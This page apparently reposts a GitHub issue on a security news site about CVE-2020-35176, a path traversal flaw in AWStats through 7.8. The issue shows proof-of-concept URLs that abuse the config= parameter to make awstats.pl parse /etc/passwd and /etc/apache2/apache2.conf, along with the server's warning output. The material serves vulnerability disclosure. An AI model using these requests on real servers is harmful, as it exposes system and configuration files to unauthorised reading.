Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2020-35176: CVE-2020-35176: path traversal flaw · Issue #195 · eldy/AWStats

In AWStats through 7.8, cgi-bin/awstats.pl?config= accepts a partial absolute pathname (omitting the initial /etc), even though it was intended to only read a file in the /etc/awstats/awstats.conf format. NOTE: this issue exists because of an incomplete fix for CVE-2017-1000501 and CVE-2020-29600.

CVE
#apache#aws

Hi,

It seems #90 is not completely fixed in 7.8.
(that is, even after CVE-2017-1000501 and CVE-2020-29600 are fixed)

Altering slightly the original example:
http://myserver.example.com/cgi-bin/awstats.pl?config=/etc/passwd
to e.g.:
http://myserver.example.com/cgi-bin/awstats.pl?config=passwd

Warning: Syntax error line 1 in file '/etc/passwd'. Config line is ignored.
Warning: Syntax error line 2 in file '/etc/passwd'. Config line is ignored.
Warning: Syntax error line 3 in file '/etc/passwd'. Config line is ignored.

http://myserver.example.com/cgi-bin/awstats.pl?config=/passwd

Warning: Syntax error line 1 in file '/etc//passwd'. Config line is ignored.
Warning: Syntax error line 2 in file '/etc//passwd'. Config line is ignored.
Warning: Syntax error line 3 in file '/etc//passwd'. Config line is ignored.

http://myserver.example.com/cgi-bin/awstats.pl?config=apache2/apache2.org

Warning: Syntax error line 80 in file '/etc/apache2/apache2.conf'. Config line is ignored.
Warning: Syntax error line 87 in file '/etc/apache2/apache2.conf'. Config line is ignored.
Warning: Syntax error line 92 in file '/etc/apache2/apache2.conf'. Config line is ignored.

it is still parsing /etc/*.

I’d expect it to only allow files within /etc/awstats/awstats*.conf.

Like #90 this requires that /etc/awstats/awstats.conf does not exist (e.g. in multi-hosting environments with no default config).

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907